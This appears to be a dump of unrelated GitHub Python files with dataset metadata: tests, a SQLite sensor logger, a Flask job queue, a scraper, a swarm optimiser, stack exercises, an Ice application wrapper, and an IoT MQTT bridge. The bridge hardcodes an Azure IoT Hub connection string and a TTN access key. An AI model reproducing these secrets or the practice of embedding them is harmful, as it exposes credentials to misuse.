patch, build)\n assert version.value == int(expected_outcome, 16).to_bytes(4, 
byteorder=\"big\")\n\n\n@pytest.mark.parametrize('byte_value, expected_major, expected_minor, expected_patch, expected_build', [\n (b'\\x11\\x01\\x00\\x01', 1, 1, 1, 1),\n (b'\\x23\\x65\\x20\\x01', 2, 3, 65, 2001),\n (b'\\x68\\x20\\x67\\x00', 6, 8, 20, 6700),\n (b'\\x10\\x00\\x00\\x00', 1, 0, 0, 0)\n])\ndef test_decoding(byte_value: bytes,\n expected_major: int, expected_minor: int, expected_patch: int, expected_build: int):\n version = VersionNumberEncoding.parse_bytes(byte_value)\n assert version.value == byte_value\n assert version.major == expected_major\n assert version.minor == expected_minor\n assert version.patch == expected_patch\n assert version.build == expected_build\n","repo_name":"Hertattack/ev3","sub_path":"src/python/test/protocol/VersionNumberEncoding_test.py","file_name":"VersionNumberEncoding_test.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6334336039","text":"import sqlite3\nfrom sqlite3 import Error\nimport time\nimport os\nimport csv\n\n\ndb_file_location = os.path.join(os.getcwd(), \"database.db\")\n\n\ndef connect_db():\n \"\"\" create a database connection to the SQLite database\n specified by the db_file\n \"\"\"\n conn = None\n try:\n conn = sqlite3.connect(db_file_location)\n except Error as e:\n print(e)\n\n return conn\n\n\ndef read_db(conn, query_str):\n \"\"\"\n Query all rows in the tasks table\n \"\"\"\n cur = conn.cursor()\n cur.execute(query_str)\n\n rows = cur.fetchall()\n\n return rows\n\n\ndef write_db(conn, sql, values):\n \"\"\" Write to database \"\"\"\n cur = conn.cursor()\n cur.execute(sql, values)\n conn.commit()\n return cur.lastrowid\n\n\ndef create_table(conn, create_table_sql):\n \"\"\" create a table from the create_table_sql statement \"\"\"\n try:\n c = conn.cursor()\n c.execute(create_table_sql)\n except Error as e:\n print(\"could not create a table\")\n print(e)\n\n\ndef create_beacons_table():\n conn = connect_db()\n\n sql = (\n \"CREATE TABLE IF NOT EXISTS beacons \"\n \"( id integer PRIMARY KEY, \"\n \"device_id text NOT NULL, \"\n \"time_stamp int, \"\n \"rssi int)\"\n )\n\n create_table(conn, sql)\n\n conn.close()\n\n\ndef create_pir_table():\n conn = connect_db()\n\n sql = (\n \"CREATE TABLE IF NOT EXISTS pir \"\n \"( id integer PRIMARY KEY, \"\n \"sensor_id int, \"\n \"time_stamp int, \"\n \"presence int)\"\n )\n\n create_table(conn, sql)\n\n conn.close()\n\n\ndef create_button_table():\n conn = connect_db()\n\n sql = (\n \"CREATE TABLE IF NOT EXISTS button \"\n \"( id integer PRIMARY KEY, \"\n \"time_stamp int, \"\n \"status int)\"\n )\n\n create_table(conn, sql)\n\n conn.close()\n\n\ndef create_ultrasonic_calibration_table():\n conn = connect_db()\n\n sql = (\n \"CREATE TABLE IF NOT EXISTS calibration_ultrasonic \"\n \"( id integer PRIMARY KEY, \"\n \"time_stamp int, \"\n \"distance real, \"\n \"mean real, \"\n \"std real)\"\n )\n\n create_table(conn, sql)\n\n conn.close()\n\n\ndef create_ultrasonic_table():\n conn = connect_db()\n\n sql = (\n \"CREATE TABLE IF NOT EXISTS ultrasonic \"\n \"( id integer PRIMARY KEY, \"\n \"time_stamp int, \"\n \"distance real, \"\n \"mean real, \"\n \"std real)\"\n )\n\n create_table(conn, sql)\n\n conn.close()\n\n\ndef create_controller_table():\n conn = connect_db()\n\n sql = (\n \"CREATE TABLE IF NOT EXISTS control_signals \"\n \"( id integer PRIMARY KEY, \"\n \"time_stamp int, \"\n \"sensor text, \"\n \"light_type text, \"\n \"signal int)\"\n )\n\n create_table(conn, sql)\n\n 
conn.close()\n\n\ndef add_fake_beacons_reading(_id, rssi):\n\n sql = \"INSERT INTO beacons(device_id, time_stamp, rssi) VALUES(?,?,?) \"\n\n reading = (_id, int(time.time()), rssi)\n\n conn = connect_db()\n\n ix = write_db(conn, sql, reading)\n\n conn.close()\n\n print(ix)\n\n\ndef main():\n\n conn = connect_db()\n\n # # query all data\n # query = \"SELECT * from beacons\"\n # rows = read_db(conn, query)\n\n # # query only last entry by beacon id\n # query_last_entry_by_id = (\n # \"SELECT device_id, rssi, MAX(time_stamp) \" \"FROM beacons \" \"GROUP BY device_id;\"\n # )\n # rows = read_db(conn, query_last_entry_by_id)\n\n # # query last entries rpi\n # now = int(time.time()) - 60\n # query_last_entry_by_id = f\"SELECT * FROM pir WHERE time_stamp > {now}\"\n # rows = read_db(conn, query_last_entry_by_id)\n\n # # query ultrasonic data\n # query = f\"SELECT * FROM calibration_ultrasonic\"\n # rows = read_db(conn, query)\n #\n # with open(\"ultrasonic_calibration.csv\", \"w\", newline=\"\") as csv_file:\n # writer = csv.writer(\n # csv_file, delimiter=\" \", quotechar=\"|\", quoting=csv.QUOTE_MINIMAL\n # )\n # for row in rows:\n # writer.writerow(row)\n\n # query ultrasonic data\n query = f\"SELECT * FROM control_signals\"\n rows = read_db(conn, query)\n\n with open(\"./control_signals_analysis/control_signals.csv\", \"w\", newline=\"\") as csv_file:\n writer = csv.writer(\n csv_file, delimiter=\" \", quotechar=\"|\", quoting=csv.QUOTE_MINIMAL\n )\n for row in rows:\n writer.writerow(row)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CenterForTheBuiltEnvironment/rpi-uv-controller","sub_path":"db_handler.py","file_name":"db_handler.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39841516731","text":"from flask import Flask, json, request, jsonify\r\n\r\n\r\nclass JobsService:\r\n def __init__(self):\r\n self.pendingJobs =[]\r\n self.workers = {}\r\n self.runningJobs = {}\r\n self.runnerCodeSequence = -1\r\n self.jobAssignmentNumber = -1\r\n def addNewJob(self, job):\r\n self.pendingJobs.append(job)\r\n def addNewWorker(self, worker):\r\n self.runnerCodeSequence = self.runnerCodeSequence+1\r\n self.workers[self.runnerCodeSequence] = worker\r\n return self.runnerCodeSequence\r\n def getWorkableJobIndex(self,availableCpu,availableMemory):\r\n for i in range(len(self.pendingJobs)):\r\n if (int(self.pendingJobs[i]['requirements']['cpu']) <= availableCpu and int(self.pendingJobs[i]['requirements']['memory']) <= availableMemory):\r\n return i\r\n return -1\r\n def getNextJob(self, resourceDetails, runnerCode):\r\n availableCpu=int(resourceDetails['cpu'])\r\n availableMemory=int(resourceDetails['memory'])\r\n acceptedJobs = {}\r\n canTakeMoreJobs = True\r\n while canTakeMoreJobs:\r\n nextJobIndex = self.getWorkableJobIndex(availableCpu,availableMemory)\r\n if (nextJobIndex > -1):\r\n self.jobAssignmentNumber = self.jobAssignmentNumber + 1\r\n self.pendingJobs[nextJobIndex]['assignedRuner'] = runnerCode\r\n self.runningJobs[self.jobAssignmentNumber] = self.pendingJobs[nextJobIndex]\r\n acceptedJobs[self.jobAssignmentNumber] = self.pendingJobs[nextJobIndex]\r\n availableCpu = availableCpu - int(self.pendingJobs[nextJobIndex]['requirements']['cpu'])\r\n availableMemory = availableMemory - int(self.pendingJobs[nextJobIndex]['requirements']['memory'])\r\n self.pendingJobs.pop(nextJobIndex)\r\n else :\r\n canTakeMoreJobs = False\r\n return acceptedJobs\r\n\r\napp = 
Flask(__name__)\r\njs = JobsService()\r\n\r\n@app.route(\"/\")\r\ndef hello():\r\n return \"I am Up and Running\";\r\n\r\n@app.route(\"/SubmitJob\", methods = [ 'POST'])\r\ndef submitNewJob():\r\n job = request.get_json()\r\n js.addNewJob(job)\r\n return \"Job Submitted\"\r\n\r\n@app.route(\"/RegisterWorker\", methods = [ 'POST'])\r\ndef registerWorker():\r\n worker = request.get_json()\r\n return jsonify(js.addNewWorker(worker));\r\n\r\n@app.route(\"/GetNextJob\", methods = [ 'POST'])\r\ndef getNextJob():\r\n details = request.get_json()\r\n return jsonify(js.getNextJob(details['resourceDetails'],details['runnerCode']));\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n\r\n","repo_name":"srinivasarajui/Lexent-challenge","sub_path":"queue/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6636923315","text":"import os\nimport csv\nimport requests\nfrom bs4 import BeautifulSoup\nfrom save_extract import save_file, brand_info\nfrom super_brand import brand\n\nos.system(\"clear\")\n\ndef brand_info(link):\n result = requests.get(link)\n soup = BeautifulSoup(result.text,'html.parser')\n soup = soup.find('div',{'id':'NormalInfo'})\n jobs = []\n\n place = []\n title = []\n time = []\n pay = []\n date = []\n try:\n for loca in soup.find_all('td',{'class':'local'}):\n place.append(loca.get_text().replace(u'\\xa0', u' '))\n for inf in soup.find_all('span',{'class':'company'}):\n title.append(inf.get_text().replace(u'\\xa0', u' '))\n for w_t in soup.find_all('td',{'class':'data'}):\n time.append(w_t.get_text())\n for pa in soup.find_all('td',{'class':'pay'}):\n pay.append(pa.get_text())\n for reg in soup.find_all('td',{'class':'regDate'}):\n date.append(reg.get_text())\n\n for i in range(len(place)):\n jobs.append([place[i],title[i],time[i],pay[i],date[i]])\n except:\n jobs = ['No Data','No Data','No Data','No Data','No Data']\n return jobs\n\nlink ='http://gs25.alba.co.kr/job/brand/?page=1&pagesize=3000'\nprint(brand_info(link))\n\n","repo_name":"IAiAye/Python","sub_path":"Day-Eight-Blueprint/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41811403662","text":"import numpy as np\n\nclass ParticleSwarm():\n def __init__(self, lower_bound, upper_bound, N_swarm_size, D_dimension, \n c1, c2, w, swarm_position=None, swarm_velocity=None):\n\n self.swarm_size = N_swarm_size\n self.dimension = D_dimension\n\n self.lower_bound = lower_bound\n self.upper_bound = upper_bound\n\n if swarm_position is None:\n self.swarm_position = self.lower_bound + (self.upper_bound - self.lower_bound)* np.random.rand(\n self.swarm_size, self.dimension\n )\n else:\n self.swarm_position = position\n\n self.swarm_velocity = np.zeros((self.swarm_size, self.dimension))\n\n self.local_best = ((-np.inf)* np.ones((self.swarm_size, self.dimension))).squeeze()\n self.global_best = -np.inf\n self.local_center = ((-np.inf)* np.ones((self.swarm_size, self.dimension))).squeeze()\n self.global_center = -np.inf\n\n self.c1 = c1\n self.c2 = c2\n self.w = w\n\n self.max_iterations = 20\n \n def particleSwarm(self):\n for iteration in range(self.max_iterations):\n if self.converge(self.swarm_position):\n break\n print(iteration)\n print(self.swarm_position)\n encountered_by_particles = self.f_objective_function(self.swarm_position)\n print(encountered_by_particles)\n\n 
self.local_center = np.where(encountered_by_particles > self.local_best, self.swarm_position, self.local_center)\n self.local_best = np.where(\n encountered_by_particles > self.local_best, encountered_by_particles, self.local_best\n )\n self.global_center = self.swarm_position[np.argmax(encountered_by_particles)] if np.max(encountered_by_particles) > self.global_best else self.global_center\n self.global_best = max(self.global_best, np.max(encountered_by_particles))\n\n local_effect = np.diag(self.local_center - self.swarm_position).reshape(-1,1)\n global_effect = self.global_center - self.swarm_position\n \n self.swarm_velocity = (self.w* self.swarm_velocity +\n self.c1* np.random.rand()* local_effect +\n self.c2* np.random.rand()* global_effect\n )\n\n self.swarm_position = self.swarm_position + self.swarm_velocity\n\n print('ans', self.global_center, self.global_best)\n\n def converge(self, position):\n values = self.f_objective_function(position)\n \n return (values == values[0]).all()\n \n def f_objective_function(self, x):\n f_ret = -x**5 + 5*x**3 + 20*x - 5\n f_ret = f_ret.squeeze()\n f_ret = np.where(np.logical_or(x>self.upper_bound, x < self.lower_bound).squeeze(), np.nan, f_ret)\n \n return f_ret\n\nif __name__ == '__main__':\n pso = ParticleSwarm(lower_bound=-4, upper_bound=4, N_swarm_size=4, D_dimension=1, c1=1, c2=1, w=1)\n #print(pso.swarm_position)\n #print(pso.swarm_velocity)\n #print(pso.f_objective_function(pso.swarm_position))\n pso.particleSwarm()","repo_name":"shiannn/Data-Science-Computing-2020-Final1","sub_path":"src/PSO.py","file_name":"PSO.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40050586154","text":"import turtle as t\r\nimport random\r\n\r\n# timmy = Turtle()\r\n# timmy.shape(\"turtle\")\r\n# timmy.color(\"red\")\r\n\r\n# for _ in range(4):\r\n# timmy.forward(100)\r\n# timmy.left(90)\r\n\r\n# arrow = Turtle()\r\n\r\n# arrow.shape(\"arrow\")\r\n\r\n# shapes = {\r\n# \"triangle\": 3,\r\n# \"square\": 4,\r\n# \"pentagon\": 5,\r\n# \"hexagon\": 6,\r\n# \"heptagon\": 7,\r\n# \"octagon\": 8,\r\n# \"nonagon\": 9,\r\n# \"decagon\": 10,\r\n# }\r\n\r\n\r\n# colors = [\"blue\", \"red\", \"orange\", \"green\", \"pink\", \"purple\", \"yellow\", \"black\"]\r\n# # the thought was more of a grab how many sides there are to basically get the arrow to turn till it has created all the sides thats why there are two for loops the second one is to determine how many times it should turn before doing it again\r\n\r\n# for i in shapes:\r\n# rand = random.choice(colors)\r\n# for _ in range(shapes[i]):\r\n# angle = 360 / shapes[i]\r\n# arrow.forward(100)\r\n# arrow.right(angle)\r\n# arrow.color(rand)\r\n\r\n\r\ntim = t.Turtle()\r\nt.colormode(255)\r\n\r\n\r\ndef random_color():\r\n r = random.randin(0, 255)\r\n g = random.randint(0, 255)\r\n b = random.randint(0, 255)\r\n color = (r, g, b)\r\n return color\r\n\r\n\r\ntim.speed(\"fastest\")\r\n\r\n\r\ndef draw_spirigraph(size_of_graph):\r\n for _ in range(int(360 / size_of_graph)):\r\n tim.color(random_color())\r\n tim.circle(100)\r\n tim.setheading(tim.heading() + 10)\r\n\r\n\r\nscreen = t.Screen()\r\nscreen.exitonclick()\r\n","repo_name":"myjourneytocoding/myjourneytocoding","sub_path":"Hirst Painting/Turtle_Challange.py","file_name":"Turtle_Challange.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} 
+{"seq_id":"27364731829","text":"import os\nimport time\nimport uuid\nimport random\nimport time\nimport sys\nimport json\nimport base64\n\n\nimport paho.mqtt.client as mqtt\n'''\nsys.path.insert(1, 'lib')\n\nfrom MQTTSNclient import Client\n'''\n# Using the Python Device SDK for IoT Hub:\n# https://github.com/Azure/azure-iot-sdk-python\n# The sample connects to a device-specific MQTT endpoint on your IoT Hub.\nfrom azure.iot.device import IoTHubDeviceClient, Message\n\n\n# The device connection string to authenticate the device with your IoT hub.\n# Using the Azure CLI:\n# az iot hub device-identity show-connection-string --hub-name {YourIoTHubName} --device-id MyNodeDevice --output table\n\nCONNECTION_STRING = \"HostName=Assignment.azure-devices.net;DeviceId=MyPythonDevice;SharedAccessKey=51kvyuxG6g+IjXLWrPyTmkQSfmD9g0HCCxzVa3zLgl0=\"\napp_id = \"uoogio_net\"\naccess_key = \"ttn-account-v2.CxCOkFC9Tz5hrzby0KNF_uO6GRQhs4ah0riVIU2o4W8\"\n\n\n\n# Define the JSON message to send to IoT Hub.\n###TEMPERATURE = 20.0\n#HUMIDITY = 60\n#WINDDIRECTION = 30\n#WINDINTENSITY = 10\n#RAINHEIGHT = 10\n#MSG_TXT = '{{\"temperature\": {temperature},\"humidity\": {humidity},\"winddirection\": {WINDDIRECTION},\"windintensity\": {WINDINTENSITY},\"rainheight\": {RAINHEIGHT}}}'\ndef ttn_on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n client.subscribe(\"+/devices/+/up\")\n\n\n\n\n\n\ndef ttn_on_message(client, userdata, msg):\n\n payl = json.loads(msg.payload.decode('utf-8'))\n\n newpayl= base64.b64decode(payl[\"payload_raw\"])\n\n\n msg= {'temperature': newpayl[0],'humidity': newpayl[1],'wind_direction': newpayl[2], 'wind_intensity': newpayl[3],'rain_height': newpayl[4]}\n print(msg)\n\n\n\n message = json.dumps(msg)\n\n client1.send_message(message)\n\ndef iothub_client_init():\n # Create an IoT Hub client\n client1 = IoTHubDeviceClient.create_from_connection_string(CONNECTION_STRING)\n return client1\n\ndef ttn_client_init(ttn_app_id, ttn_access_key, on_con, on_msg):\n\n client = mqtt.Client()\n client.on_connect = on_con\n client.on_message = on_msg\n client.username_pw_set(ttn_app_id, ttn_access_key )\n client.connect(\"eu.thethings.network\", 1883, 60)\n\n # Blocking call that processes network traffic, dispatches callbacks and\n # handles reconnecting.\n # Other loop*() functions are available that give a threaded interface and a\n # manual interface.\n client.loop_forever()\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n '''\n topic='topic'\n '''\n print ( \"Meteo station.\" )\n print ( \"Press Ctrl-C to exit\" )\n '''\n gateway = Client(\"gw\", port=1885)\n gateway.registerCallback(Callback())\n gateway.connect()\n gateway.subscribe(topic)\n\n while True:\n time.sleep(1)\n '''\n client1 = iothub_client_init()\n ttn_client_init(app_id, access_key, ttn_on_connect, ttn_on_message)\n print(\"Sto ascoltando...\")\n\n time.sleep(120)\n mqtt_client.close()\n","repo_name":"uoogio/IOT-assignments","sub_path":"RIOT_dev/simulated-device/Device.py","file_name":"Device.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31536303063","text":"\n\nclass Stack:\n\n def __init__(self):\n self.pila = []\n\n def vaciar(self):\n self.pila.clear()\n\n def push(self, item):\n self.pila.append(item)\n\n def pop(self):\n pop = None\n if not self.estaVacia():\n 
pop = self.pila.pop()\n else:\n raise Exception('pila vacia')\n return pop\n\n def top(self):\n dato = None\n if not self.estaVacia():\n dato = self.pila[len(self.pila)-1]\n else:\n raise Exception('pila vacia')\n return dato\n\n def clonar(self):\n clon = Stack()\n for e in self.pila:\n clon.push(e)\n return clon\n\n def len(self):\n return len(self.pila)\n \n def estaVacia(self):\n return len(self.pila) == 0\n\n def __repr__(self):\n return str(self.pila)\n\n\n\n\npila = Stack()\npila.push(5),pila.push(1), pila.push(2), pila.push(3),pila.push(4),pila.push(5),pila.push(5)\n\n\n#inverite la pila que resive por parametro\n\ndef invertirPila(pila):\n aux = pila.clonar()\n pila.vaciar()\n while not aux.estaVacia():\n pila.push(aux.pop())\n\n\ndef ultimoAPrimero(pila):\n aux = pila.clonar()\n pila.vaciar()\n while not aux.estaVacia():\n pila.push(aux.pop())\n top = pila.pop()\n invertirPila(pila)\n pila.push(top)\n\n\n\n#coloca un elemento al fondo de la pila\n\ndef pushFondo(pila,elemento):\n aux = pila.clonar()\n pila.vaciar()\n while not aux.estaVacia():\n pila.push(aux.pop())\n pila.push(elemento)\n invertirPila(pila)\n\n\n# eliminar la ocurrencia de la pila\n# elemento pasado por parametro\n\ndef eliminarOcurencia(pila, elemento):\n aux = pila.clonar()\n pila.vaciar()\n while not aux.estaVacia():\n if aux.top() != elemento:\n pila.push(aux.pop())\n else:\n aux.pop()\n invertirPila(pila)\n\n\n# duplica la pila pasada por parametro\n\ndef duplicarPila(pila):\n aux = pila.clonar()\n invertirPila(aux)\n while not aux.estaVacia():\n pila.push(aux.pop())\n\n\n# pila 1 = 8 5 6 9 9 6 2 5 \n# pila 2 = 7 5 4 2 6 6 5 2 \n# pila res = 1 6 1 1 2 6 7 7\n\npila1 = Stack()\npila2 = Stack()\n\npila1.push(8), pila1.push(5), pila1.push(6), pila1.push(9), pila1.push(9), pila1.push(6), pila1.push(2), pila1.push(5)\npila2.push(7), pila2.push(5), pila2.push(4), pila2.push(2), pila2.push(6), pila2.push(6), pila2.push(7), pila2.push(7)\n\n\ndef sumarDigitos(pila1, pila2):\n aux1 = pila1.clonar()\n aux2 = pila2.clonar()\n res = Stack()\n resto = 0\n while not aux1.estaVacia() and not aux2.estaVacia():\n suma = aux1.pop() + aux2.pop() + resto\n resto = suma // 10\n res.push(suma % 10)\n if resto:\n res.push(resto)\n invertirPila(res)\n return res\n\n\n\nprint(sumarDigitos(pila1,pila2))\n","repo_name":"adrianyaniri/estructuraDatos","sub_path":"ColasPilas/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41628752732","text":"import abc\nimport os\nimport signal\nimport threading\nimport traceback\n\nimport Glacier2\nimport Ice\n\n\nclass _ApplicationLoggerI(Ice.Logger):\n\n def __init__(self, py_logger):\n super(_ApplicationLoggerI, self).__init__()\n self._py_logger = py_logger\n\n def _print(self, message):\n self._py_logger.info(message)\n\n def trace(self, category, message):\n self._py_logger.info('{} : {}'.format(category, message) if category else message)\n\n def warning(self, message):\n self._py_logger.warning(message)\n\n def error(self, message):\n self._py_logger.error(message)\n\n\nclass Application(abc.ABC):\n\n def __init__(self, signal_policy=0):\n \"\"\"The constructor accepts an optional argument indicating whether to handle signals.\n\n :param signal_policy:\n Application.HandleSignals (the default) or\n Application.NoSignalHandling.\n \"\"\"\n Application._signalPolicy = signal_policy\n\n def main(self, args: list, config_file: str, init_data_list: list, 
logger):\n \"\"\"The main entry point for the Application class.\n\n :param args:\n The arguments are an argument list (such as sys.argv), 最高优先级\n :param config_file:\n The file path of an Ice configuration file,次优先级\n :param init_data_list:\n InitializationData properties 参数,最低优先级\n [('Ice.Default.Host', '127.0.0.1'), ('Ice.Warn.Connections', '1'), ... ]\n :param logger:\n python 的标准库 logger 对象\n :return:\n This method does not return until after the completion of the run method.\n The return value is an integer representing the exit status.\n \"\"\"\n if Application._communicator:\n Ice.getProcessLogger().error(args[0] + \": only one instance of the Application class can be used\")\n return 1\n\n Ice.setProcessLogger(_ApplicationLoggerI(logger))\n\n #\n # We parse the properties here to extract Ice.ProgramName.\n #\n init_data = self.generate_init_data(config_file, init_data_list, args)\n\n #\n # Install our handler for the signals we are interested in. We assume main() is called from the main thread.\n #\n if Application._signalPolicy == Application.HandleSignals:\n Application._ctrlCHandler = Ice.CtrlCHandler()\n\n try:\n Application._interrupted = False\n Application._app_name = \\\n init_data.properties.getPropertyWithDefault(\"Ice.ProgramName\", args[0])\n Application._application = self\n\n #\n # Used by _destroy_on_interrupt_callback and _shutdown_on_interrupt_callback.\n #\n Application._nohup = init_data.properties.getPropertyAsInt(\"Ice.Nohup\") > 0\n\n #\n # The default is to destroy when a signal is received.\n #\n if Application._signalPolicy == Application.HandleSignals:\n Application.destroy_on_interrupt()\n\n status = self.do_main(args, init_data)\n except Exception as e:\n Ice.getProcessLogger().error('main loop exception {}\\n{}'.format(e, traceback.format_exc()))\n status = 1\n\n #\n # Set _ctrlCHandler to 0 only once communicator.destroy() has completed.\n #\n if Application._signalPolicy == Application.HandleSignals:\n Application._ctrlCHandler.destroy()\n Application._ctrlCHandler = None\n\n return status\n\n @staticmethod\n def generate_init_data(config_file, init_data_list, args):\n init_data = Ice.InitializationData()\n init_data.properties = Ice.createProperties(None, None)\n for _property in init_data_list:\n assert isinstance(_property[0], str) and isinstance(_property[1], str)\n init_data.properties.setProperty(_property[0], _property[1])\n if config_file and os.path.isfile(config_file):\n init_data.properties = Ice.createProperties(None, init_data.properties)\n init_data.properties.load(config_file)\n if args:\n init_data.properties = Ice.createProperties(args, init_data.properties)\n return init_data\n\n def do_main(self, args, init_data):\n try:\n Application._communicator = Ice.initialize(args, init_data)\n Application._destroyed = False\n status = self.run(args)\n except Exception as e:\n Ice.getProcessLogger().error('{}\\n{}'.format(e, traceback.format_exc()))\n status = 1\n\n #\n # Don't want any new interrupt and at this point (post-run),\n # it would not make sense to release a held signal to run\n # shutdown or destroy.\n #\n if Application._signalPolicy == Application.HandleSignals:\n Application.ignore_interrupt()\n\n Application._condVar.acquire()\n while Application._callbackInProgress:\n Application._condVar.wait()\n if Application._destroyed:\n Application._communicator = None\n else:\n Application._destroyed = True\n #\n # And _communicator != 0, meaning will be destroyed\n # next, _destroyed = true also ensures that any\n # remaining 
callback won't do anything\n #\n Application._application = None\n Application._condVar.release()\n\n if Application._communicator:\n try:\n Application._communicator.destroy()\n except Exception as e:\n Ice.getProcessLogger().error(\n 'destroy _communicator exception {}\\n{}'.format(e, traceback.format_exc()))\n status = 1\n Application._communicator = None\n return status\n\n @abc.abstractmethod\n def run(self, args):\n \"\"\"This method must be overridden in a subclass.\n The base class supplies an argument list from which all Ice arguments have already been removed.\n The method returns an integer exit status (0 is success, non-zero is failure).\n \"\"\"\n raise RuntimeError('run() not implemented')\n\n def interrupt_callback(self, sig):\n \"\"\"Subclass hook to intercept an interrupt.\"\"\"\n pass\n\n def app_name(cls):\n \"\"\"Returns the application name (the first element of the argument list).\"\"\"\n return cls._app_name\n\n app_name = classmethod(app_name)\n\n def communicator(cls):\n \"\"\"Returns the communicator that was initialized for the application.\"\"\"\n return cls._communicator\n\n communicator = classmethod(communicator)\n\n def destroy_on_interrupt(cls):\n \"\"\"Configures the application to destroy its communicator when interrupted by a signal.\"\"\"\n if Application._signalPolicy == Application.HandleSignals:\n cls._condVar.acquire()\n if cls._ctrlCHandler.getCallback() == cls._hold_interrupt_callback:\n cls._released = True\n cls._condVar.notify()\n cls._ctrlCHandler.setCallback(cls._destroy_on_interrupt_callback)\n cls._condVar.release()\n else:\n Ice.getProcessLogger().error(\"interrupt method called on Application configured to not handle interrupts.\")\n\n destroy_on_interrupt = classmethod(destroy_on_interrupt)\n\n def shutdown_on_interrupt(cls):\n \"\"\"Configures the application to shutdown its communicator when interrupted by a signal.\"\"\"\n if Application._signalPolicy == Application.HandleSignals:\n cls._condVar.acquire()\n if cls._ctrlCHandler.getCallback() == cls._hold_interrupt_callback:\n cls._released = True\n cls._condVar.notify()\n cls._ctrlCHandler.setCallback(cls._shutdown_on_interrupt_callback)\n cls._condVar.release()\n else:\n Ice.getProcessLogger().error(\"interrupt method called on Application configured to not handle interrupts.\")\n\n shutdown_on_interrupt = classmethod(shutdown_on_interrupt)\n\n def ignore_interrupt(cls):\n \"\"\"Configures the application to ignore signals.\"\"\"\n if Application._signalPolicy == Application.HandleSignals:\n cls._condVar.acquire()\n if cls._ctrlCHandler.getCallback() == cls._hold_interrupt_callback:\n cls._released = True\n cls._condVar.notify()\n cls._ctrlCHandler.setCallback(None)\n cls._condVar.release()\n else:\n Ice.getProcessLogger().error(\"interrupt method called on Application configured to not handle interrupts.\")\n\n ignore_interrupt = classmethod(ignore_interrupt)\n\n def callback_on_interrupt(cls):\n \"\"\"Configures the application to invoke interrupt_callback when interrupted by a signal.\"\"\"\n if Application._signalPolicy == Application.HandleSignals:\n cls._condVar.acquire()\n if cls._ctrlCHandler.getCallback() == cls._hold_interrupt_callback:\n cls._released = True\n cls._condVar.notify()\n cls._ctrlCHandler.setCallback(cls._callback_on_interrupt_callback)\n cls._condVar.release()\n else:\n Ice.getProcessLogger().error(\"interrupt method called on Application configured to not handle interrupts.\")\n\n callback_on_interrupt = classmethod(callback_on_interrupt)\n\n def 
hold_interrupt(cls):\n \"\"\"Configures the application to queue an interrupt for later processing.\"\"\"\n if Application._signalPolicy == Application.HandleSignals:\n cls._condVar.acquire()\n if cls._ctrlCHandler.getCallback() != cls._hold_interrupt_callback:\n cls._previousCallback = cls._ctrlCHandler.getCallback()\n cls._released = False\n cls._ctrlCHandler.setCallback(cls._hold_interrupt_callback)\n # else, we were already holding signals\n cls._condVar.release()\n else:\n Ice.getProcessLogger().error(\"interrupt method called on Application configured to not handle interrupts.\")\n\n hold_interrupt = classmethod(hold_interrupt)\n\n def release_interrupt(cls):\n \"\"\"Instructs the application to process any queued interrupt.\"\"\"\n if Application._signalPolicy == Application.HandleSignals:\n cls._condVar.acquire()\n if cls._ctrlCHandler.getCallback() == cls._hold_interrupt_callback:\n #\n # Note that it's very possible no signal is held;\n # in this case the callback is just replaced and\n # setting _released to true and signalling _condVar\n # do no harm.\n #\n cls._released = True\n cls._ctrlCHandler.setCallback(cls._previousCallback)\n cls._condVar.notify()\n # Else nothing to release.\n cls._condVar.release()\n else:\n Ice.getProcessLogger().error(\"interrupt method called on Application configured to not handle interrupts.\")\n\n release_interrupt = classmethod(release_interrupt)\n\n def interrupted(cls):\n \"\"\"Returns True if the application was interrupted by a signal, or False otherwise.\"\"\"\n cls._condVar.acquire()\n result = cls._interrupted\n cls._condVar.release()\n return result\n\n interrupted = classmethod(interrupted)\n\n def _hold_interrupt_callback(cls, sig):\n cls._condVar.acquire()\n while not cls._released:\n cls._condVar.wait()\n if cls._destroyed:\n #\n # Being destroyed by main thread\n #\n cls._condVar.release()\n return\n callback = cls._ctrlCHandler.getCallback()\n cls._condVar.release()\n if callback:\n callback(sig)\n\n _hold_interrupt_callback = classmethod(_hold_interrupt_callback)\n\n def _destroy_on_interrupt_callback(cls, sig):\n cls._condVar.acquire()\n if cls._destroyed or cls._nohup and sig == signal.SIGHUP:\n #\n # Being destroyed by main thread, or nohup.\n #\n cls._condVar.release()\n return\n\n cls._callbackInProcess = True\n cls._interrupted = True\n cls._destroyed = True\n cls._condVar.release()\n\n try:\n cls._communicator.destroy()\n except Exception as e:\n Ice.getProcessLogger().error(\n \"{} (while destroying in response to signal {}): e: {}\\n{}\".format(\n cls._app_name, str(sig), e, traceback.format_exc()))\n\n cls._condVar.acquire()\n cls._callbackInProcess = False\n cls._condVar.notify()\n cls._condVar.release()\n\n _destroy_on_interrupt_callback = classmethod(_destroy_on_interrupt_callback)\n\n def _shutdown_on_interrupt_callback(cls, sig):\n cls._condVar.acquire()\n if cls._destroyed or cls._nohup and sig == signal.SIGHUP:\n #\n # Being destroyed by main thread, or nohup.\n #\n cls._condVar.release()\n return\n\n cls._callbackInProcess = 